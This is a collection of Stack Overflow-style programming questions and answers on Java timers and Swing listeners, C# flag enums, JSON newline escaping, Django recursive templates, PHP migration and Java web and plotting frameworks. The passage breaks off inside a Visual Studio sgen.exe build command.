The way I see it is this. You have a Windows Service, which is playing the role of a scheduler and in it there are some classes which simply call the webservices and put the data in your databases. So, you can use these classes directly from the WebUI as well and import the data based on the WebUI trigger. I don't like the idea of storing a user generated action as a flag (trigger) in the database where some service will poll it (at an interval which is not under the user's control) to execute that action. You could even convert the whole code into an exe which you can then schedule using the Windows Scheduler. And call the same exe whenever the user triggers the action from the Web UI.
Timer-based event triggers
[ "sql", "web-services", "service", "triggers", "timer" ]
I have a web service that I created in C# and a test harness that was provided by my client. Unfortunately my web service doesn't seem to be parsing the objects created by the test harness. I believe the problem lies with serializing the soap packet. Using TCPTrace I was able to get the soap packet passed to the web service but only on a remote machine so I can't debug it there. Is there a way of calling my local webservice with the soap packet generated rather than my current test harness where I manually create objects and call the web service through a web reference? [edit] The machine that I got the soap packet was on a vm so I can't link it to my machine. I suppose I'm looking for a tool that I can paste the soap packet into and it will in turn call my web service
A somewhat manual process would be to use the [Poster](http://code.google.com/p/poster-extension/) add-in for Firefox. There is also a java utility called [SoapUI](http://sourceforge.net/project/showfiles.php?group_id=136013&package_id=163662&release_id=500134) that has some discovery based automated templates that you can then modify and run against your service.
By default, .Net will not allow you to connect a packet analyzer like TCPTrace or Fiddler (which I prefer) to localhost or 127.0.0.1 connections (for reasons that I forget now..) Best way would be to reference your web services via a full IP address or FQDN where possible. That will allow you to trace the calls in the tool of your choice.
Debugging Web Service with SOAP Packet
[ "c#", "web-services", "soap", "tcptrace-pocketsoap" ]
I'd like to have a java.util.Timer with a resettable time in Java. I need to set a once-off event to occur in X seconds. If nothing happens in between the time the timer was created and X seconds, then the event occurs as normal. If, however, before X seconds has elapsed, I decide that the event should occur after Y seconds instead, then I want to be able to tell the timer to reset its time so that the event occurs in Y seconds. E.g. the timer should be able to do something like: ``` Timer timer = new Timer(); timer.schedule(timerTask, 5000); //Timer starts in 5000 ms (X) //At some point between 0 and 5000 ms... setNewTime(timer, 8000); //timerTask will fire in 8000ms from NOW (Y). ``` I don't see a way to do this using java.util.Timer, as if you call cancel() you cannot schedule it again. The only way I've come close to replicating this behavior is by using javax.swing.Timer, and it involves stopping the original timer and creating a new one. i.e.: ``` timer.stop(); timer = new Timer(8000, ActionListener); timer.start(); ``` Is there an easier way??
According to the [`Timer`](http://java.sun.com/javase/6/docs/api/java/util/Timer.html) documentation, in Java 1.5 onwards, you should prefer the [`ScheduledThreadPoolExecutor`](http://java.sun.com/javase/6/docs/api/java/util/concurrent/ScheduledThreadPoolExecutor.html) instead. (You may like to create this executor using [`Executors`](http://java.sun.com/javase/6/docs/api/java/util/concurrent/Executors.html)`.newSingleThreadScheduledExecutor()` for ease of use; it creates something much like a `Timer`.) The cool thing is, when you schedule a task (by calling `schedule()`), it returns a [`ScheduledFuture`](http://java.sun.com/javase/6/docs/api/java/util/concurrent/ScheduledFuture.html) object. You can use this to cancel the scheduled task. You're then free to submit a new task with a different triggering time. ETA: The `Timer` documentation linked to doesn't say anything about `ScheduledThreadPoolExecutor`, however the [OpenJDK](http://openjdk.java.net/) version had this to say: > Java 5.0 introduced the `java.util.concurrent` package and > one of the concurrency utilities therein is the > `ScheduledThreadPoolExecutor` which is a thread pool for repeatedly > executing tasks at a given rate or delay. It is effectively a more > versatile replacement for the `Timer`/`TimerTask` > combination, as it allows multiple service threads, accepts various > time units, and doesn't require subclassing `TimerTask` (just > implement `Runnable`). Configuring > `ScheduledThreadPoolExecutor` with one thread makes it equivalent to > `Timer`.
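The cancel-and-resubmit approach that `ScheduledFuture` enables can be sketched in another language as well. Below is an illustrative Python sketch using `threading.Timer`; the `ResettableTimer` helper is hypothetical and not part of any library discussed above.

```python
import threading


class ResettableTimer:
    """One-shot timer whose firing delay can be reset before it elapses.

    Sketch of the cancel-and-reschedule idea: resetting cancels the
    pending timer and starts a fresh one with the new delay.
    """

    def __init__(self, delay, callback):
        self._callback = callback
        self._timer = threading.Timer(delay, callback)
        self._timer.start()

    def reset(self, delay):
        self._timer.cancel()  # discard the old schedule
        self._timer = threading.Timer(delay, self._callback)
        self._timer.start()

    def cancel(self):
        self._timer.cancel()
```

Each `reset` call mirrors calling `cancel()` on the old `ScheduledFuture` and then `schedule()`-ing the task again with a new trigger time.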
If your `Timer` is only ever going to have one task to execute then I would suggest subclassing it: ``` import java.util.Timer; import java.util.TimerTask; public class ReschedulableTimer extends Timer { private Runnable task; private TimerTask timerTask; public void schedule(Runnable runnable, long delay) { task = runnable; timerTask = new TimerTask() { @Override public void run() { task.run(); } }; this.schedule(timerTask, delay); } public void reschedule(long delay) { timerTask.cancel(); timerTask = new TimerTask() { @Override public void run() { task.run(); } }; this.schedule(timerTask, delay); } } ``` You will need to work on the code to add checks for mis-use, but it should achieve what you want. The `ScheduledThreadPoolExecutor` does not seem to have built in support for rescheduling existing tasks either, but a similar approach should work there as well.
Resettable Java Timer
[ "java", "timer" ]
I am trying to link two fields of a given table to the same field in another table. I have done this before so I can't work out what is wrong this time. Anyway: ``` Table1 - Id (Primary) - FK-Table2a (Nullable, foreign key relationship in DB to Table2.Id) - FK-Table2b (Nullable, foreign key relationship in DB to Table2.Id) Table2 - Id (Primary) ``` The association works for FK-Table2a but not FK-Table2b. In fact, when I load into LINQ to SQL, it shows Table2.Id as associated to Table1.Id. If I try and change this, or add a new association for FK-Table2b to Table2.Id it says: "Properties do not have matching types". This also works in other projects - maybe I should just copy over the .dbml? Any ideas?
No idea on the cause, but I just reconstructed my .dbml from scratch and it fixed itself. Oh for a "refresh" feature...
I see this problem when I try to create one-to-one relationships where one side of the relationship is nullable (so really, one-to-zero/one). LINQ-to-SQL doesn't seem to support this so it appears we are forced to a plural relationship and a collection that will contain zero or one items. Annoying.
LINQ to SQL Association - "Properties do not have matching types"
[ "c#", "asp.net", "linq-to-sql", "dynamic-data" ]
I have a flag enum below. ``` [Flags] public enum FlagTest { None = 0x0, Flag1 = 0x1, Flag2 = 0x2, Flag3 = 0x4 } ``` I cannot make the if statement evaluate to true. ``` FlagTest testItem = FlagTest.Flag1 | FlagTest.Flag2; if (testItem == FlagTest.Flag1) { // Do something, // however This is never true. } ``` How can I make this true?
In .NET 4 there is a new method [Enum.HasFlag](http://msdn.microsoft.com/en-us/library/system.enum.hasflag%28VS.100%29.aspx). This allows you to write: ``` if ( testItem.HasFlag( FlagTest.Flag1 ) ) { // Do Stuff } ``` which is much more readable, IMO. The .NET source indicates that this performs the same logic as the accepted answer: ``` public Boolean HasFlag(Enum flag) { if (!this.GetType().IsEquivalentTo(flag.GetType())) { throw new ArgumentException( Environment.GetResourceString( "Argument_EnumTypeDoesNotMatch", flag.GetType(), this.GetType())); } ulong uFlag = ToUInt64(flag.GetValue()); ulong uThis = ToUInt64(GetValue()); // test predicate return ((uThis & uFlag) == uFlag); } ```
``` if ((testItem & FlagTest.Flag1) == FlagTest.Flag1) { // Do something } ``` `(testItem & FlagTest.Flag1)` is a bitwise AND operation. `FlagTest.Flag1` is equivalent to `001` with OP's enum. Now let's say `testItem` has Flag1 and Flag2 (so it's bitwise `101`): ``` 001 &101 ---- 001 == FlagTest.Flag1 ```
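The same bitwise logic holds outside C#. As a point of comparison only, here is a sketch with Python's `enum.Flag` mirroring the accepted test:

```python
from enum import Flag, auto


class FlagTest(Flag):
    NONE = 0
    FLAG1 = auto()  # 0b001
    FLAG2 = auto()  # 0b010
    FLAG3 = auto()  # 0b100


test_item = FlagTest.FLAG1 | FlagTest.FLAG2  # combined value 0b011

# Plain equality fails for the same reason as in the question:
# 0b011 is not equal to 0b001.
assert test_item != FlagTest.FLAG1

# Bitwise AND isolates the flag of interest, mirroring
# (testItem & FlagTest.Flag1) == FlagTest.Flag1 in C#.
assert (test_item & FlagTest.FLAG1) == FlagTest.FLAG1

# A flag that was never set fails the same test.
assert (test_item & FlagTest.FLAG3) != FlagTest.FLAG3
```

Python's `Flag` also supports a `HasFlag`-style membership test (`FlagTest.FLAG1 in test_item`), analogous to the .NET 4 `Enum.HasFlag` mentioned in the other answer.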
How to Compare Flags in C#?
[ "c#", ".net", "enums", "attributes", "flags" ]
I have values stored as strings in a `DataTable` where each value could really represent an `int`, `double`, or `string` (they were all converted to strings during an import process from an external data source). I need to test and see what type each value really is. What is more efficient for the application (or is there no practical difference)? 1. Try to convert to `int` (and then `double`). If conversion works, then return `true`. If an exception is thrown, return `false`. 2. Regular expressions designed to match the pattern of an `int` or `double` 3. Some other method?
I would use double.TryParse; it has performance benefits over the exception-based approach, since no exception has to be thrown and caught on failure.
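The try-the-narrow-type-first idea generalizes beyond C#. The following is an illustrative Python sketch (the `classify` helper is hypothetical) showing the same classification order the question describes:

```python
def classify(value):
    """Classify a string as 'int', 'double', or 'string'.

    Sketch of the TryParse idea: attempt the narrower conversion
    first and fall back, instead of pattern-matching with regexes.
    """
    try:
        int(value)
        return "int"
    except ValueError:
        pass
    try:
        float(value)
        return "double"
    except ValueError:
        return "string"
```

Attempting `int` before `float` matters: every string that parses as an `int` also parses as a `float`, so testing in the other order would never report `"int"`.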
I would say, don't worry so much about such micro performance. It is much better to just get something to work, and then make it as clear and concise and easy to read as possible. The worst thing you can do is sacrifice readability for an insignificant amount of performance. In the end, the best way to deal with performance issues is to save them for when you have data that indicates there is an actual performance problem... otherwise you will spend a lot of time micro-optimizing and actually cause higher maintenance costs for later on. If you find this parsing situation is really the bottleneck in your application, THEN is the time to try and figure out what the fastest way to solve the problem is. I think Jeff (and many others) have blogged about this sort of thing a lot.
Most Efficient Way to Test Object Type
[ "c#", ".net", "double", "int" ]
So I've got a `JPanel` implementing `MouseListener` and `MouseMotionListener`: ``` import javax.swing.*; import java.awt.*; import java.awt.event.*; public class DisplayArea extends JPanel implements MouseListener, MouseMotionListener { public DisplayArea(Rectangle bounds, Display display) { setLayout(null); setBounds(bounds); setOpaque(false); setPreferredSize(new Dimension(bounds.width, bounds.height)); this.display = display; } public void paintComponent(Graphics g) { Graphics2D g2 = (Graphics2D)g; if (display.getControlPanel().Antialiasing()) { g2.addRenderingHints(new RenderingHints(RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON)); } g2.setColor(Color.white); g2.fillRect(0, 0, getWidth(), getHeight()); } public void mousePressed(MouseEvent event) { System.out.println("mousePressed()"); mx1 = event.getX(); my1 = event.getY(); } public void mouseReleased(MouseEvent event) { System.out.println("mouseReleased()"); mx2 = event.getX(); my2 = event.getY(); int mode = display.getControlPanel().Mode(); switch (mode) { case ControlPanel.LINE: System.out.println("Line from " + mx1 + ", " + my1 + " to " + mx2 + ", " + my2 + "."); } } public void mouseEntered(MouseEvent event) { System.out.println("mouseEntered()"); } public void mouseExited(MouseEvent event) { System.out.println("mouseExited()"); } public void mouseClicked(MouseEvent event) { System.out.println("mouseClicked()"); } public void mouseMoved(MouseEvent event) { System.out.println("mouseMoved()"); } public void mouseDragged(MouseEvent event) { System.out.println("mouseDragged()"); } private Display display = null; private int mx1 = -1; private int my1 = -1; private int mx2 = -1; private int my2 = -1; } ``` The trouble is, none of these mouse functions are ever called. 
`DisplayArea` is created like this: ``` da = new DisplayArea(new Rectangle(CONTROL_WIDTH, 0, DISPLAY_WIDTH, DISPLAY_HEIGHT), this); ``` I am not really a Java programmer (this is part of an assignment), but I can't see anything glaringly obvious. Can someone smarter than I see anything?
The *implements MouseListener, MouseMotionListener* clause just allows the DisplayArea class to listen to the mouse events of some Swing component, still to be specified. You have to explicitly define what it should be listening to. So I suppose you could add something like this to the constructor: ``` this.addMouseListener(this); this.addMouseMotionListener(this); ```
I don't see anywhere in the code where you call addMouseListener(this) or addMouseMotionListener(this) for the DisplayArea in order for it to subscribe to those events.
My (Java/Swing) MouseListener isn't listening, help me figure out why
[ "java", "swing", "actionlistener", "mouselistener" ]
I've generated some JSON and I'm trying to pull it into an object in JavaScript. I keep getting errors. Here's what I have: ``` var data = '{"count" : 1, "stack" : "sometext\n\n"}'; var dataObj = eval('('+data+')'); ``` This gives me an error: ``` unterminated string literal ``` With `JSON.parse(data)`, I see similar error messages: "`Unexpected token ↵`" in Chrome, and "`unterminated string literal`" in Firefox and IE. When I take out the `\n` after `sometext` the error goes away in both cases. I can't seem to figure out why the `\n` makes `eval` and `JSON.parse` fail.
This is what you want: ``` var data = '{"count" : 1, "stack" : "sometext\\n\\n"}'; ``` You need to escape the `\` in your string (turning it into a double-`\`), otherwise it will become a newline in the JSON source, not the JSON data.
You will need to have a function which replaces `\n` with `\\n`, in case `data` is not a string literal. ``` function jsonEscape(str) { return str.replace(/\n/g, "\\n").replace(/\r/g, "\\r").replace(/\t/g, "\\t"); } var data = '{"count" : 1, "stack" : "sometext\n\n"}'; var dataObj = JSON.parse(jsonEscape(data)); ``` The resulting `dataObj` will be ``` Object {count: 1, stack: "sometext\n\n"} ```
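The same pre-escaping fix can be sketched in Python. One caveat worth stating: this simple replacement assumes the only literal control characters appear inside string values; escaping a newline that sits between JSON tokens (e.g. in pretty-printed JSON) would corrupt the document.

```python
import json


def json_escape(raw):
    # Turn literal control characters into their two-character
    # JSON escape sequences (a real newline becomes backslash + 'n').
    return (raw.replace("\n", "\\n")
               .replace("\r", "\\r")
               .replace("\t", "\\t"))


raw = '{"count" : 1, "stack" : "sometext\n\n"}'  # contains real newlines
data = json.loads(json_escape(raw))              # parses cleanly
```

Without the escaping step, `json.loads(raw)` rejects the input for the same reason `JSON.parse` does: an unescaped control character inside a string literal is invalid JSON.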
How do I handle newlines in JSON?
[ "javascript", "json", "newline" ]
I am considering creating my own website using Java and am trying to decide what framework to use. However, doing a quick search for Java frameworks returns more than 50 to choose from! My website is just going to be for my own enjoyment of building it in the beginning, but if it becomes popular, it would be good for it to have some scalability, or to at least be able to redesign for that. What are the main differences between the more popular frameworks? Are there instances where one significantly outperforms the others? For example, high-traffic enterprise applications versus low-traffic small applications. I'm also wondering if some are much easier to learn and use than others. Is there anyone who has experience with some of these frameworks and can make a recommendation? Does the sheer number of choices just serve as an early warning to avoid Java-based web development where possible?
I've used [Tapestry 3](http://tapestry.apache.org/tapestry3/), [Wicket](http://wicket.apache.org/), [Echo](http://echo.nextapp.com/site/), and [JSF](http://www.oracle.com/technetwork/java/javaee/javaserverfaces-139869.html) fairly extensively. I'd really recommend you look those over and pick the one that appears the easiest for you, and to most closely fit the way you prefer to work. Of them, the most comfortable for me to work with was [Wicket](http://wicket.apache.org/), due to the lightweight nature of component building and simplicity of page templating. That goes doubly so if you are using your own db code instead of Hibernate or some other framework (I was never completely happy with Wicket Hibernate or Spring Integration). [Echo](http://echo.nextapp.com/site/) is great if you don't mind writing all of your layout in Java. I know that is different now, but I still think that product serves a fairly narrow niche. They change the development model with every major release as well it seems. [Tapestry](http://tapestry.apache.org/tapestry3/) is a great product, but it is obviously very different from the others in terms of development model as it is led mainly by one dude. Howard Lewis Ship is no doubt quite smart, but I am disappointed with their decision to basically forget backwards compatibility with each release. Again, though, for your needs this may not matter, and I've always found the Tapestry products pleasurable to work against. [JSF](http://www.oracle.com/technetwork/java/javaee/javaserverfaces-139869.html) has been out for years, and still feels like something that a [Struts](http://struts.apache.org/) guy built to fix all of the problems of Struts. Without really understanding all of the problems with Struts. It still has an unfinished feel to it, although the product is obviously very flexible. I use it and have some fondness for it, with great hopes for its future. 
I think the next release (2.0) to be delivered in JEE6 will really bring it into its own, with a new template syntax (similar to Facelets) and a simplified component model (custom components in only 1 file... finally). And, of course, there are a million smaller frameworks and tools that get their own following ([Velocity](http://velocity.apache.org/) for basic needs, raw [JSPs](http://en.wikipedia.org/wiki/JavaServer_Pages), Struts, etc). I generally prefer component oriented frameworks myself, though. In the end, I'd recommend just taking a look at Tapestry, Wicket, and JSF and just picking the one that feels the best to you. You'll probably find one that just fits the way you like to work very quickly.
My favorite is the Spring Framework. With 2.5 Spring MVC is soooo kick ass, with new annotations, convention over configuration features, etc. If you're just doing something super simple you could also just try using the regular Servlet API and not bother with a framework.
What are the pros and cons of the assorted Java web frameworks?
[ "java", "web-frameworks", "rich-internet-application" ]
After reading the Head First Design Patterns book and using a number of other design patterns, I'm trying to understand the Observer pattern. Isn't this already implemented using Events in the .NET Framework?
Yes, it is. The observer pattern is also called the publish/subscribe pattern, which is exactly what events allow you to do.
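For readers coming from languages without built-in events, the publish/subscribe mechanism that C# events provide can be sketched in a few lines. This is an illustrative Python sketch with hypothetical names, not any particular library's API:

```python
class Event:
    """Minimal publish/subscribe event, sketching what C# events provide."""

    def __init__(self):
        self._handlers = []

    def subscribe(self, handler):
        # Analogous to C#'s `+=` on an event.
        self._handlers.append(handler)

    def fire(self, *args):
        # Analogous to invoking the event from the publisher.
        for handler in self._handlers:
            handler(*args)


class Button:
    def __init__(self):
        self.clicked = Event()  # observers attach here

    def click(self):
        self.clicked.fire(self)


log = []
button = Button()
button.clicked.subscribe(lambda sender: log.append("observer A"))
button.clicked.subscribe(lambda sender: log.append("observer B"))
button.click()
```

The `Button` knows nothing about its observers beyond the handler list, which is exactly the decoupling the observer pattern describes.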
I would say yes, it was Anders Hejlsberg's intent to make the observer pattern a first-class language feature with events in C#, based on his experience with Delphi. Anders makes this and other design intentions clear in an excellent interview on [Software Engineering Radio](http://www.se-radio.net/podcast/2008-05/episode-97-interview-anders-hejlsberg).
In C#, isn't the observer pattern already implemented using Events?
[ "c#", ".net", "design-patterns" ]
Is it possible for the compiler to remove statements used for debugging purposes (such as logging) from production code? The debug statements would need to be marked somehow, maybe using annotations. It's easy to set a property (debug = true) and check it at each debug statement, but this can reduce performance. It would be nice if the compiler would simply make the debug statements vanish.
Two recommendations. **First:** for real logging, use a modern logging package like log4j or java's own built in logging. Don't worry about performance so much, the logging level check is on the order of nanoseconds. (it's an integer comparison). And if you have more than a single log statement, guard the whole block: (log4j, for example:) ``` if (logger.isDebugEnabled()) { // perform expensive operations // build string to log logger.debug("...."); } ``` This gives you the added ability control logging at runtime. Having to restart and run a debug build can be very inconvenient. **Second:** You may find [assertions](http://java.sun.com/j2se/1.4.2/docs/guide/lang/assert.html) are more what you need. An assertion is a statement which evaluates to a boolean result, with an optional message: ``` assert (sky.state != FALLING) : "The sky is falling!"; ``` Whenever the assertion results in a false, the assertion fails and an AssertionError is thrown containing your message (this is an unchecked exception, intended to exit the application). The neat thing is, these are treated special by the JVM and can toggled at runtime down to the class level, using a VM parameter (no recompile needed). If not enabled, there is zero overhead.
``` public abstract class Config { public static final boolean ENABLELOGGING = true; } ``` --- ``` import static Config.*; public class MyClass { public void myMethod() { System.out.println("Hello, non-logging world"); if (ENABLELOGGING) { log("Hello, logging world."); } } } ``` The compiler will remove the code block with "Hello, logging world." in it if ENABLELOGGING is set to false, because it's a static final value. If you use an obfuscator such as ProGuard, then the Config class will vanish too. An obfuscator would also allow things like this instead: ``` public class MyClass { public void myMethod() { System.out.println("Hello, non-logging world"); Log.log("Hello, logging world."); } } ``` --- ``` import static Config.*; public abstract class Log { public static void log(String s) { if (ENABLELOGGING) { System.out.println(s); // actually write the log entry } } } ``` The method Log#log would reduce to nothing in the compiler and be removed by the obfuscator, along with any calls to that method; eventually even the Log class itself would be removed.
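As a point of comparison, Python has a version of this constant-folding trick built in: blocks guarded by the compile-time constant `__debug__` (and all `assert` statements) are stripped from the compiled bytecode when the interpreter runs with `-O`. A small illustrative sketch:

```python
DEBUG = False  # plays the role of the static final flag


def compute(x):
    if DEBUG:
        # Skipped at runtime when DEBUG is False. Note that unlike
        # javac with a static final, CPython does not delete this
        # block from the bytecode for an ordinary module constant.
        print("compute called with", x)
    if __debug__:
        # This block (like all asserts) IS removed from the compiled
        # bytecode when Python is run with the -O flag.
        assert x >= 0, "x must be non-negative"
    return x * 2
```

So the Java approach above (constant flag plus an obfuscator pass) is doing manually what some language toolchains expose as a first-class feature.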
How to remove debug statements from production code in Java
[ "java", "debugging", "compiler-construction" ]
I have a tree structure in memory that I would like to render in HTML using a Django template. ``` class Node(): name = "node name" children = [] ``` There will be some object `root` that is a `Node`, and `children` is a list of `Node`s. `root` will be passed in the context of the template. I have found [this](http://blog.elsdoerfer.name/2008/01/22/recursion-in-django-templates/) discussion of how this might be achieved, but the poster suggests this might not be good in a production environment. Does anybody know of a better way?
I think the canonical answer is: "Don't". What you should probably do instead is unravel the thing in your *view* code, so it's just a matter of iterating over (in|de)dents in the template. I think I'd do it by appending indents and dedents to a list while recursing through the tree and then sending that "travelogue" list to the template. (The template would then insert `<li>` and `</li>` from that list, creating the recursive structure without "understanding" it.) I'm also pretty sure recursively including template files is really a *wrong* way to do it...
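The "unravel it in the view" suggestion can be made concrete with a short sketch. The `Node` class mirrors the one in the question; the `travelogue` helper is a hypothetical name for the flattening step:

```python
class Node:
    def __init__(self, name, children=None):
        self.name = name
        self.children = children or []


def travelogue(node, depth=0):
    """Flatten a tree into (depth, name) pairs in the view code.

    The template then only iterates this flat list and compares
    consecutive depths to decide how many indents/dedents to emit.
    """
    yield depth, node.name
    for child in node.children:
        yield from travelogue(child, depth + 1)


root = Node("root", [Node("a", [Node("a1")]), Node("b")])
flat = list(travelogue(root))
```

With this, the template needs no recursion at all: it walks `flat` in order and emits opening or closing `<ul>` tags whenever the depth increases or decreases.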
Using `with` template tag, I could do tree/recursive list. Sample code: main template: assuming 'all\_root\_elems' is list of one or more root of tree ``` <ul> {%for node in all_root_elems %} {%include "tree_view_template.html" %} {%endfor%} </ul> ``` tree\_view\_template.html renders the nested `ul`, `li` and uses `node` template variable as below: ``` <li> {{node.name}} {%if node.has_childs %} <ul> {%for ch in node.all_childs %} {%with node=ch template_name="tree_view_template.html" %} {%include template_name%} {%endwith%} {%endfor%} </ul> {%endif%} </li> ```
How can I render a tree structure (recursive) using a django template?
[ "python", "django" ]
What are some good steps to follow for a smooth migration from PHP4 to PHP5. What are some types of code that are likely to break?
I also once worked on an app which used PHP4's XML support quite heavily, and it would have required quite a bit of work to move to PHP5. One of the other significant changes I was looking at at the time was the change in the default handling of function parameters. In PHP4, if I remember correctly, objects were pass-by-copy unless you specified otherwise, but in PHP5 they changed to pass-by-reference by default. In well-written code, that probably won't make a big difference to you, but it could certainly cause problems. I think one other thing I found changed is that objects are no longer allowed to overwrite their 'this' field. I would say that was a really bad idea to begin with (and I think it may not have been an intentional feature in PHP4), but I certainly found a few parts of our system that relied on it. Hope some of that helps.
The best advice I could give anyone working with PHP4 is this: ``` error_reporting( E_ALL ); ``` It pretty much will tell you exactly what you need to do.
PHP4 to PHP5 Migration
[ "php", "migration" ]
On a recent Java project, we needed a free Java based real-time data plotting utility. After much searching, we found this tool called the [Scientific Graphics Toolkit or SGT](http://www.epic.noaa.gov/java/sgt/) from NOAA. It seemed pretty robust, but we found out that it wasn't terribly configurable. Or at least not configurable enough to meet our needs. We ended up digging very deeply into the Java code and reverse engineering the code and changing it all around to make the plot tool look and act the way we wanted it to look and act. Of course, this killed any chance for future upgrades from NOAA. So what free or cheap Java based data plotting tools or libraries do you use? *Followup: Thanks for the [JFreeChart](http://www.jfree.org/jfreechart/) suggestions. I checked out their website and it looks like a very nice data charting and plotting utility. I should have made it clear in my original question that I was looking specifically to plot real-time data. I corrected my question above to make that point clear. It appears that [JFreeChart support for live data is marginal at best, though](http://www.jfree.org/jfreechart/faq.html#FAQ5). Any other suggestions out there?*
I've had success using [JFreeChart](http://www.jfree.org/jfreechart/) on multiple projects. It is *very* configurable. JFreeChart is open source, but they charge for the [developer guide](http://www.jfree.org/jfreechart/devguide.html). If you're doing something simple, the sample code is probably good enough. Otherwise, $50 for the developer guide is a pretty good bargain. With respect to "real-time" data, I've also used JFreeChart for these sorts of applications. Unfortunately, I had to create some custom data models with appropriate synchronization mechanisms to avoid race conditions. However, it wasn't terribly difficult and JFreeChart would still be my first choice. However, as the FAQ suggests, JFreeChart might not give you the best performance if that is a big concern.
I just ran into a similar issue (displaying fast-updating data for engineering purposes), and I'm using [JChart2D](http://jchart2d.sourceforge.net/docs/javadoc/index.html). It's pretty minimalist and has a few quirks but it seems fairly fast: I'm running a benchmark speed test where it's adding 2331 points per second (333x7 traces) to a strip chart and uses 1% of the CPU on my 3GHz Pentium 4.
Are there any decent free Java data plotting libraries out there?
[ "java", "plot", "configuration" ]
I've been developing a "Form Builder" in Javascript, and coming up to the part where I'll be sending the spec for the form back to the server to be stored. The builder maintains an internal data structure that represents the fields, label, options (for select/checkbox/radio), mandatory status, and the general sorting order of the fields. When I want to send this structure back to the server, which format should I communicate it with? Also, when restoring a server-saved form back into my Javascript builder, should I load in the data in the same format it sent it with, or should I rebuild the fields using the builder's `createField()` functions?
Best practice on this dictates that if you are not planning to use the stored data for anything other than recreating the form, then the best method is to send it back in some sort of native format (as mentioned above). That way you can just load the data back in, and it requires the least processing of any method.
When making and processing requests with JavaScript, I live and breathe [JSON](http://json.org/). It's easy to build on the client side and there are tons of parsers for the server side, so both ends get to use their native tongue as much as possible.
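To make that concrete, here is a minimal sketch of round-tripping a form spec through JSON (the field names and structure are hypothetical, not the asker's actual builder):

```javascript
// Hedged sketch: serialize a hypothetical form-builder spec to JSON for
// the server, then parse it back when restoring a saved form.
const formSpec = {
  fields: [
    { type: "text",   label: "Name",  mandatory: true,  order: 1 },
    { type: "select", label: "Color", mandatory: false, order: 2,
      options: ["red", "green", "blue"] }
  ]
};

const payload  = JSON.stringify(formSpec); // POST this string to the server
const restored = JSON.parse(payload);      // parse what the server sends back
console.log(restored.fields.length);       // 2
```

On restore, each entry of `restored.fields` can then be fed back through the builder's own `createField()` calls, which keeps the builder's internal invariants intact.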
Communication between Javascript and the server
[ "", "javascript", "server", "" ]
I would like to have an `iframe` take as much vertical space as it needs to display its content and not display a scrollbar. Is it at all possible ? Are there any workarounds?
This should set the `IFRAME` height to its content's height: ``` <script type="text/javascript"> var the_height = document.getElementById('the_iframe').contentWindow.document.body.scrollHeight; document.getElementById('the_iframe').height = the_height; </script> ``` You may want to add `scrolling="no"` to your `IFRAME` to turn off the scrollbars. *edit:* Oops, forgot to declare `the_height`; fixed above with `var`.
This CSS snippet should remove the vertical scrollbar: ``` body { overflow-x: hidden; overflow-y: hidden; } ``` I'm not sure yet about having it take up as much vertical space as it needs, but I'll see if I can't figure it out.
Making an iframe take vertical space
[ "", "javascript", "html", "css", "iframe", "" ]
After changing the output directory of a visual studio project it started to fail to build with an error very much like: ``` C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\bin\sgen.exe /assembly:C:\p4root\Zantaz\trunk\EASDiscovery\EASDiscoveryCaseManagement\obj\Release\EASDiscoveryCaseManagement.dll /proxytypes /reference:C:\p4root\Zantaz\trunk\EASDiscovery\EasDiscovery.Common\target\win_x32\release\results\EASDiscovery.Common.dll /reference:C:\p4root\Zantaz\trunk\EASDiscovery\EasDiscovery.Export\target\win_x32\release\results\EASDiscovery.Export.dll /reference:c:\p4root\Zantaz\trunk\EASDiscovery\ItemCache\target\win_x32\release\results\EasDiscovery.ItemCache.dll /reference:c:\p4root\Zantaz\trunk\EASDiscovery\RetrievalEngine\target\win_x32\release\results\EasDiscovery.RetrievalEngine.dll /reference:C:\p4root\Zantaz\trunk\EASDiscovery\EASDiscoveryJobs\target\win_x32\release\results\EASDiscoveryJobs.dll /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Shared.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.Misc.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinChart.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinDataSource.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinDock.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinEditors.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinGrid.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 
1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinListView.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinMaskedEdit.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinStatusBar.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinTabControl.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinToolbars.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinTree.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.v8.1.dll" /reference:"C:\Program Files\Microsoft Visual Studio 8\ReportViewer\Microsoft.ReportViewer.Common.dll" /reference:"C:\Program Files\Microsoft Visual Studio 8\ReportViewer\Microsoft.ReportViewer.WinForms.dll" /reference:C:\p4root\Zantaz\trunk\EASDiscovery\PreviewControl\target\win_x32\release\results\PreviewControl.dll 